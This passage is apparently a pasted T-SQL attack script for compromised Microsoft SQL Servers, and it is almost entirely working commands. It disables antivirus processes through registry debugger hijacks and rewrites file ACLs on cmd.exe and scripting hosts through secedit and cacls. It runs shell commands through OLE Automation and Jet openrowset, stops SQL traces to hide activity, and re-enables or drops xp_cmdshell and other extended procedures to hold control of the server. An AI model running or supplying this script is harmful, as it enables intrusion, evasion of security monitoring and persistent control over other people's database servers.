  394. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmdagent.exe','Debugger','REG_SZ','taskkill.exe'
  395. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQPCRTP.EXE','Debugger','REG_SZ','taskkill.exe'
  396. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQPCTray.exe','Debugger','REG_SZ','taskkill.exe'
  397. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RSTRAY.EXE','Debugger','REG_SZ','taskkill.exe'
  398. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXp.exe','Debugger','REG_SZ','taskkill.exe'
  399. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.exe','Debugger','REG_SZ','taskkill.exe'
  400. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvxp.kxp','Debugger','REG_SZ','taskkill.exe'
  401. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SHSTAT.EXE','Debugger','REG_SZ','taskkill.exe'
  402. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp','Debugger','REG_SZ','taskkill.exe'
  403.  
  404. GO
  405.  
  406. declare @o int, @f int, @t int, @ret int
  407. exec sp_oacreate 'scripting.filesystemobject', @o out
  408. exec sp_oamethod @o, 'createtextfile', @f out, 'fuckgothin.inf', 1
  409. exec @ret = sp_oamethod @f, 'writeline', NULL,'[Version]'
  410. exec @ret = sp_oamethod @f, 'writeline', NULL,'signature="$CHICAGO$"'
  411. exec @ret = sp_oamethod @f, 'writeline', NULL,'[File Security]'
  412. exec @ret = sp_oamethod @f, 'writeline', NULL,'1="c:\windows\system32\cmd.exe", 2, "D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)"'
  413. exec @ret = sp_oamethod @f, 'writeline', NULL,'1="c:\windows\system32\wscript.exe", 2, "D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)"'
  414. exec @ret = sp_oamethod @f, 'writeline', NULL,'1="c:\windows\system32\cscript.exe", 2, "D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)"'
  415. exec @ret = sp_oamethod @f, 'writeline', NULL,'1="C:\Program Files\Common Files\System\ado\msado15.dll", 2, "D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)"';
  416. GO
  417. DECLARE @ObjectToken INT;EXEC sp_OACreate '{00000566-0000-0010-8000-00AA006D2EA4}', @ObjectToken OUTPUT;EXEC sp_OASetProperty @ObjectToken, 'Type', 1;EXEC sp_OAMethod @ObjectToken, 'Open';EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x5B56657273696F6E5D0D0A7369676E61747572653D22244348494341474F24220D0A5B46696C652053656375726974795D0D0A313D22633A5C77696E646F77735C73797374656D33325C636D642E657865222C20322C2022443A5028413B3B475247583B3B3B42552928413B3B475247583B3B3B50552928413B3B47413B3B3B42412928413B3B47413B3B3B535929220D0A313D22633A5C77696E646F77735C73797374656D33325C6674702E657865222C20322C2022443A5028413B3B475247583B3B3B42552928413B3B475247583B3B3B50552928413B3B47413B3B3B42412928413B3B47413B3B3B535929220D0A313D22633A5C77696E646F77735C73797374656D33325C6361636C732E657865222C20322C2022443A5028413B3B475247583B3B3B42552928413B3B475247583B3B3B50552928413B3B47413B3B3B42412928413B3B47413B3B3B535929220D0A313D22633A5C77696E646F77735C73797374656D33325C6E6574312E657865222C20322C2022443A5028413B3B475247583B3B3B42552928413B3B475247583B3B3B50552928413B3B47413B3B3B42412928413B3B47413B3B3B535929220D0A313D22433A5C50726F6772616D2046696C65735C436F6D6D6F6E2046696C65735C53797374656D5C61646F5C6D7361646F31352E646C6C222C20322C2022443A5028413B3B475247583B3B3B42552928413B3B475247583B3B3B50552928413B3B47413B3B3B42412928413B3B47413B3B3B53592922;EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'FuckGOthin.inf', 2;EXEC sp_OAMethod @ObjectToken, 'Close';EXEC sp_OADestroy @ObjectToken;
  418. GO
  419. DECLARE @shell INT EXEC SP_OAcreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'secedit /configure /db secedit.sdb /cfg FuckGOthin.inf';
  420. GO
  421. DECLARE @shell INT EXEC SP_OAcreate '{13709620-C279-11CE-A49E-444553540000}',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'secedit /configure /db secedit.sdb /cfg FuckGOthin.inf';
  422. go
  423. declare @a varchar(8000);select * from openrowset('microsoft.jet.oledb.4.0',';database=svch0st.xml','select shell("cmd /c c:\windows\system32\config\regsvr32.exe scrrun.dll wshom.ocx urlmon.dll shdocvw.dll jscript.dll vbscript.dll msvcp71.dll msadox.dll /s /u")');
  424. --sp_password
  425. go
  426. declare @shell002 int exec sp_oacreate 'wscript.shell',@shell002 output exec sp_oamethod @shell002,'run',null,'c:\windows\system32\config\regsvr32.exe scrrun.dll wshom.ocx urlmon.dll shdocvw.dll jscript.dll vbscript.dll msvcp71.dll msadox.dll /s','0','true';
  427. --sp_password
  428. go
  429. declare @a varchar(8000);select * from openrowset('microsoft.jet.oledb.4.0',';database=svch0st.xml','select shell("cmd /c c:\windows\system32\config\regsvr32.exe scrrun.dll wshom.ocx urlmon.dll shdocvw.dll jscript.dll vbscript.dll msvcp71.dll msadox.dll /s")');
  430. --sp_password
  431. go
  432. DECLARE @objLocator int,@objWmi int,@objPermiss int,@objFull int,@objRet int;
  433. EXEC sp_OACreate 'WbemScripting.SWbemLocator.1',@objLocator OUTPUT;
  434. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWmi OUTPUT,'.','root\cimv2';
  435. EXEC sp_OAMethod @objWmi,'Get',@objPermiss OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''wscript.exe''';
  436. EXEC sp_OAMethod @objWmi,'Get',@objFull OUTPUT,'Win32_SecurityDescriptor';
  437. EXEC sp_OASetProperty @objFull,'ControlFlags',4;
  438. EXEC sp_OAMethod @objPermiss,'SetSecurityDescriptor',@objRet output,@objFull;SELECT @objRet
  439. go
  440. DECLARE @objLocator int,@objWmi int,@objPermiss int,@objFull int,@objRet int;
  441. EXEC sp_OACreate 'WbemScripting.SWbemLocator.1',@objLocator OUTPUT;
  442. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWmi OUTPUT,'.','root\cimv2';
  443. EXEC sp_OAMethod @objWmi,'Get',@objPermiss OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''cacls.exe''';
  444. EXEC sp_OAMethod @objWmi,'Get',@objFull OUTPUT,'Win32_SecurityDescriptor';
  445. EXEC sp_OASetProperty @objFull,'ControlFlags',4;
  446. EXEC sp_OAMethod @objPermiss,'SetSecurityDescriptor',@objRet output,@objFull;SELECT @objRet
  447. go
  448. DECLARE @objLocator int,@objWmi int,@objPermiss int,@objFull int,@objRet int;
  449. EXEC sp_OACreate 'WbemScripting.SWbemLocator.1',@objLocator OUTPUT;
  450. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWmi OUTPUT,'.','root\cimv2';
  451. EXEC sp_OAMethod @objWmi,'Get',@objPermiss OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''cmd.exe''';
  452. EXEC sp_OAMethod @objWmi,'Get',@objFull OUTPUT,'Win32_SecurityDescriptor';
  453. EXEC sp_OASetProperty @objFull,'ControlFlags',4;
  454. EXEC sp_OAMethod @objPermiss,'SetSecurityDescriptor',@objRet output,@objFull;SELECT @objRet
  455. go
  456. DECLARE @objLocator int,@objWmi int,@objPermiss int,@objFull int,@objRet int;
  457. EXEC sp_OACreate 'WbemScripting.SWbemLocator.1',@objLocator OUTPUT;
  458. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWmi OUTPUT,'.','root\cimv2';
  459. EXEC sp_OAMethod @objWmi,'Get',@objPermiss OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''regini.exe''';
  460. EXEC sp_OAMethod @objWmi,'Get',@objFull OUTPUT,'Win32_SecurityDescriptor';
  461. EXEC sp_OASetProperty @objFull,'ControlFlags',4;
  462. EXEC sp_OAMethod @objPermiss,'SetSecurityDescriptor',@objRet output,@objFull;SELECT @objRet
  463. go
  464. declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov1 output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov,'run',null,'C:\WINDOWS\system32\cacls.exe %SystemRoot%\system32\wscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe cscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe ftp.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe regini.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe reg.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe taskkill.EXE /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe wbemdisp.tlb /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe C:\WINDOWS\system32\ias\ias.mdb /e /t /g system:F';
  465. go
  466. declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov1 output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov,'run',null,'C:\WINDOWS\help\akpls.exe %SystemRoot%\system32\wscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe cscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe ftp.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe regini.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe reg.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe taskkill.EXE /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe wbemdisp.tlb /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe C:\WINDOWS\system32\ias\ias.mdb /e /t /g system:F';
  467. go
  468. declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov1 output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov,'run',null,'c:\windows\system32\wbem\vice.exe %SystemRoot%\system32\wscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe cscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe ftp.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe regini.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe reg.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe taskkill.EXE /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe wbemdisp.tlb /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe C:\WINDOWS\system32\ias\ias.mdb /e /t /g system:F';
  469. go
  470. declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov1 output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov,'run',null,'C:\WINDOWS\inf\wmis.inf %SystemRoot%\system32\wscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf cscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf ftp.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf regini.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf reg.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf taskkill.EXE /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf wbemdisp.tlb /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf C:\WINDOWS\system32\ias\ias.mdb /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf cacls.exe /e /t /g system:F';
  471. go
  472. declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov1 output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov,'run',null,'C:\Windows\System32\60hack.exe %SystemRoot%\system32\wscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe cscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe ftp.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe regini.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe reg.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe taskkill.EXE /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe wbemdisp.tlb /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe C:\WINDOWS\system32\ias\ias.mdb /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe cacls.exe /e /t /g system:F';
  473. go
  474. declare @aa int
  475. exec sp_oacreate 'scripting.filesystemobject', @aa out
  476. exec sp_oamethod @aa, 'DeleteFolder',null,'c:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5';
  477. --sp_password
  478. go
  479.  
  480. if(@@version like 'Microsoft SQL Server  2000%')
  481. exec sp_trace_setstatus 1, 0;
  482. go
  483. exec sp_trace_setstatus 2, 0;
  484. go
  485. exec sp_trace_setstatus 2, 2;    
  486.  
  487. go
  488. use master  
  489. exec sp_configure 'show advanced options',1;
  490. exec sp_configure 'Ad Hoc Distributed Queries',1;
  491.          
  492. go
  493. use master  
  494. EXEC sp_configure 'show advanced options', 1;
  495. RECONFIGURE;
  496. EXEC sp_configure 'xp_cmdshell', 1;
  497. RECONFIGURE;              
  498.  
  499. go
  500. use master  
  501. DROP PROCEDURE sp_addextendedproc;
  502. DROP PROCEDURE sp_dropextendedproc;
  503.  
  504. go
  505. create procedure sp_addextendedproc
  506. @functname nvarchar(517), @dllname varchar(255) as
  507. set implicit_transactions off
  508. if @@trancount > 0
  509. begin
  510. raiserror(15002,-1,-1,'sp_addextendedproc')
  511. return (1)
  512. end
  513. dbcc addextendedproc( @functname, @dllname)
  514. return (0)
  515.  
  516. go  
  517. create procedure dbo.sp_dropextendedproc
  518. @functname nvarchar(517), @dllname varchar(255) as
  519. set implicit_transactions off  
  520. if @@trancount > 0  
  521. begin  
  522. raiserror(15002,-1,-1,'sys.sp_dropextendedproc')  
  523. return (1)  
  524. end    
  525. dbcc dropextendedproc( @functname )  
  526. return (0)
  527.  
  528. go  
  529. dbcc dropextendedproc ("xp_cmdshell")
  530.  
  531. go  
  532. drop PROCEDURE sp_OACreate
  533. drop PROCEDURE xp_cmdshell  
  534. drop PROCEDURE xp_dirtree  
  535. drop PROCEDURE sp_oamethod  
  536. drop PROCEDURE xp_regaddmultistring  
  537. drop PROCEDURE xp_regdeletekey  
  538. drop PROCEDURE xp_regdeletevalue  
  539. drop PROCEDURE xp_regenumvalues  
  540. drop PROCEDURE xp_regread  
  541. drop PROCEDURE xp_regwrite  
  542. drop PROCEDURE xp_makewebtask
  543.  
  544. go  
  545. USE master;  
  546. EXEC sp_configure 'show advanced options', 1;
  547. RECONFIGURE WITH OVERRIDE;  
  548. EXEC sp_configure 'Ole Automation Procedures', 1;  
  549. RECONFIGURE WITH OVERRIDE;  
  550. EXEC sp_configure 'show advanced options', 0;
  551.  
  552. go  
  553. EXEC sp_configure 'show advanced options', 1;
  554. RECONFIGURE;
  555.  
  556. go  
  557. EXEC sp_configure 'Ole Automation Procedures', 1;
  558. RECONFIGURE;  
  559.  
  560. go
  561. EXEC sp_configure 'xp_cmdshell', 1;
  562. RECONFIGURE;  
  563.  
  564. go  
  565. use master
  566. exec sp_addextendedproc xp_dirtree,'xpstar.dll'      
  567. exec sp_addextendedproc xp_enumgroups,'xplog70.dll'      
  568. exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'      
  569. exec sp_addextendedproc xp_loginconfig,'xplog70.dll'      
  570. exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'      
  571. exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'      
  572. exec sp_addextendedproc sp_OACreate,'odsole70.dll'      
  573. exec sp_addextendedproc sp_OADestroy,'odsole70.dll'      
  574. exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'      
  575. exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'      
  576. exec sp_addextendedproc sp_OAMethod,'odsole70.dll'      
  577. exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'      
  578. exec sp_addextendedproc sp_OAStop,'odsole70.dll'      
  579. exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'      
  580. exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'      
  581. exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'      
  582. exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'      
  583. exec sp_addextendedproc xp_regread,'xpstar.dll'      
  584. exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'      
  585. exec sp_addextendedproc xp_regwrite,'xpstar.dll'      
  586. exec sp_addextendedproc xp_availablemedia,'xpstar.dll'  
  587.  
  588. go  
  589. dbcc dropextendedproc ("xp_cmdshell");
  590. dbcc addextendedproc ("xp_cmdshell","xplog70.dll");
  591. dbcc dropextendedproc ("xp_dirtree");
  592. dbcc addextendedproc ("xp_dirtree","xpstar.dll");
  593. dbcc dropextendedproc ("xp_regread");
  594. dbcc addextendedproc ("xp_regread","xpstar.dll");
  595. dbcc dropextendedproc ("xp_regwrite");
  596. dbcc addextendedproc ("xp_regwrite","xpstar.dll");
  597. dbcc dropextendedproc ("xp_regdeletekey");
  598. dbcc addextendedproc ("xp_regdeletekey","xpstar.dll");
  599. dbcc dropextendedproc ("xp_regenumkeys");
  600. dbcc addextendedproc ("xp_regenumkeys","xpstar.dll");
  601. dbcc dropextendedproc ("xp_regdeletevalue");
  602. dbcc addextendedproc ("xp_regdeletevalue","xpstar.dll");
  603. dbcc dropextendedproc ("sp_OACreate");
  604. dbcc addextendedproc ("sp_OACreate","odsole70.dll");
  605. dbcc dropextendedproc ("sp_OAMethod");
  606. dbcc addextendedproc ("sp_OAMethod","odsole70.dll");
  607. dbcc dropextendedproc ("sp_OASetProperty");
  608. dbcc addextendedproc ("sp_OASetProperty","odsole70.dll");
  609. dbcc dropextendedproc ("sp_OADestroy");
  610. dbcc addextendedproc ("sp_OADestroy","odsole70.dll");
  611.  
  612. go
  613. exec sp_addextendedproc sp_OAMethod,'odsole70.dll'    
  614. dbcc addextendedproc ("xp_cmdshell","xplog70.dll")  
  615.  
  616. go  
  617. DROP PROCEDURE sp_OAMethod;DROP PROCEDURE sp_OACreate;
  618. DROP PROCEDURE sp_OASetProperty;
  619. DROP PROCEDURE sp_OADestroy  
  620.  
  621. go
  622. exec sp_addextendedproc sp_OAMethod,'odsole70.dll';
  623. exec sp_addextendedproc sp_OACreate,'odsole70.dll';
  624. exec sp_addextendedproc sp_OASetProperty,'odsole70.dll';
  625. exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
  626.  
  627. go  
  628. EXEC master.dbo.xp_regwrite 'HKEY_CLASSES_ROOT','WScript.Shell\CLSID','(Ĭ��)','REG_SZ','{72C24DD5-D70A-438B-8A42-98424B88AFB8}'  
  629.  
  630. go  
  631. EXEC master.dbo.xp_regwrite 'HKEY_CLASSES_ROOT','Scripting.FileSystemObject\CLSID','(Ĭ��)','REG_SZ','{0D43FE01-F093-11CF-8940-00A0C9054228}'  
  632.  
  633. go  
  634. EXEC master.dbo.xp_regwrite 'HKEY_CLASSES_ROOT','Scripting.FileSystemObject','(Ĭ��)','REG_SZ','FileSystem Object'  
  635.  
  636. go  
  637. exec xp_makecab 'C:\Windows\System\1.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\odsole70.dll'
  638. exec xp_unpackcab 'C:\Windows\System\1.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  639. exec xp_unpackcab 'C:\Windows\System\1.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  640. exec xp_unpackcab 'C:\Windows\System\1.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  641. exec xp_makecab 'C:\Windows\System\2.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\odsole70.dll'
  642. exec xp_unpackcab 'C:\Windows\System\2.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  643. exec xp_unpackcab 'C:\Windows\System\2.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  644. exec xp_unpackcab 'C:\Windows\System\2.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  645. exec xp_makecab 'C:\Windows\System\3.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\odsole70.dll'
  646. exec xp_unpackcab 'C:\Windows\System\3.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  647. exec xp_unpackcab 'C:\Windows\System\3.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  648. exec xp_unpackcab 'C:\Windows\System\3.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  649. exec xp_makecab 'C:\Windows\System\4.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\xplog70.dll'
  650. exec xp_unpackcab 'C:\Windows\System\4.Zip','C:\Windows\System',1
  651. exec xp_makecab 'C:\Windows\System\5.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\xplog70.dll'
  652. exec xp_unpackcab 'C:\Windows\System\5.Zip','C:\Windows\System',1
  653. exec xp_makecab 'C:\Windows\System\6.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\xplog70.dll'
  654. exec xp_unpackcab 'C:\Windows\System\6.Zip','C:\Windows\System',1
  655. exec xp_makecab 'C:\Windows\System\7.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\xpstar.dll'
  656. exec xp_unpackcab 'C:\Windows\System\7.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  657. exec xp_unpackcab 'C:\Windows\System\7.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  658. exec xp_unpackcab 'C:\Windows\System\7.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  659. exec xp_makecab 'C:\Windows\System\8.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\xpstar.dll'
  660. exec xp_unpackcab 'C:\Windows\System\8.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  661. exec xp_unpackcab 'C:\Windows\System\8.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  662. exec xp_unpackcab 'C:\Windows\System\8.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  663. exec xp_makecab 'C:\Windows\System\9.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\xpstar.dll'
  664. exec xp_unpackcab 'C:\Windows\System\9.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  665. exec xp_unpackcab 'C:\Windows\System\9.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  666. exec xp_unpackcab 'C:\Windows\System\9.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  667.  
  668. go
  669. if(@@version like 'Microsoft SQL Server  2000%')  
  670. use master;  
  671. else  
  672. exec sp_trace_setstatus 5, 0;  
  673. go
  674. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_trace_setstatus]'))drop procedure sp_trace_setstatus
  675. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_addextendedproc]'))drop procedure sp_addextendedproc
  676. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))drop procedure sp_oacreate
  677. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))drop procedure sp_OASetProperty
